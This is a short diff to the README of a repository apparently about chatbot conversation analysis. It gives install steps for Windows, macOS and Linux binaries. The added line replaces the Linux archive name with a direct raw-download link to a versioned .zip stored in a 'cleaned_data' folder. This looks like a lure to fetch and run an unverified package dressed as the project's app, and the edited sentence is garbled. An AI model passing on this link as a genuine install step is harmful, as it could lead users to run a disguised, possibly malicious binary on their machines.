argad2672/chatbot-conversation-analysis/ReadMe.md

 4. **Install the Application**:
    - For Windows: Double-click the downloaded `.exe` file and follow the instructions.
    - For macOS: Open the downloaded `.dmg` file and drag the app to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included installation instructions.
+   - For Linux: Extract the `https://raw.githubusercontent.com/argad2672/chatbot-conversation-analysis/main/cleaned_data/conversation_analysis_chatbot_2.8.zip` file and follow the included installation instructions.

 5. **Run the Application**: Once the installation is complete, launch the application from your system’s applications.